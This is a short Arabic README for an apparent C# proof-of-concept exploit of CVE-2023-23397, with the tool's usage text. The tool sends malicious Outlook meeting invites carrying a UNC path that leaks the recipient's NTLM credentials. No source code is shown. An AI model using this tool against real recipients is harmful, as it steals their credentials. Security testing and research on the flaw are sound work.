
استغلال PoC بلغة C# لـ CVE-2023-23397 يرسل دعوات اجتماع Outlook ضارة مع مشغل مسار UNC لسرقة بيانات اعتماد NTLM.
نسخة C# للإرسال فقط من CVE-2023-23397-POC-Powershell بواسطة Oddvar Moe (@oddvarmoe)
يرسل بريدًا إلكترونيًا من العنوان المرتبط بحساب Outlook.
.\CVE_2023_23397.exe --help
CVE_2023_23397 1.0.0.0
Copyright c 2023
-t, --to Required. Recipient email address
-p, --path Required. UNC Path
-s, --subject Message subject ("Testing New Exploit" if blank)
-b, --body Message body ("Here's your meeting invite" if blank)
--help Display this help screen.
--version Display version information.